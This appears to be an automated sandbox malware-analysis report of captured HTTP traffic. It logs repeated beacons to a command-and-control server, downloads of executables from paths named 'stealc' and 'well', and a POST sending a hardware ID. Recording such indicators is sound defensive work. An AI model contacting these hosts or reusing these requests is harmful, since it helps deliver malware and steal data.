Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBHost: 85.28.47.30Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 46 36 41 36 32 38 32 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 2d 2d 0d 0a Data Ascii: ------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="hwid"18EF6A6282E5845770397------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="build"Nice------CBFCBKKFBAEHJKEBKFCB--
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000007001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
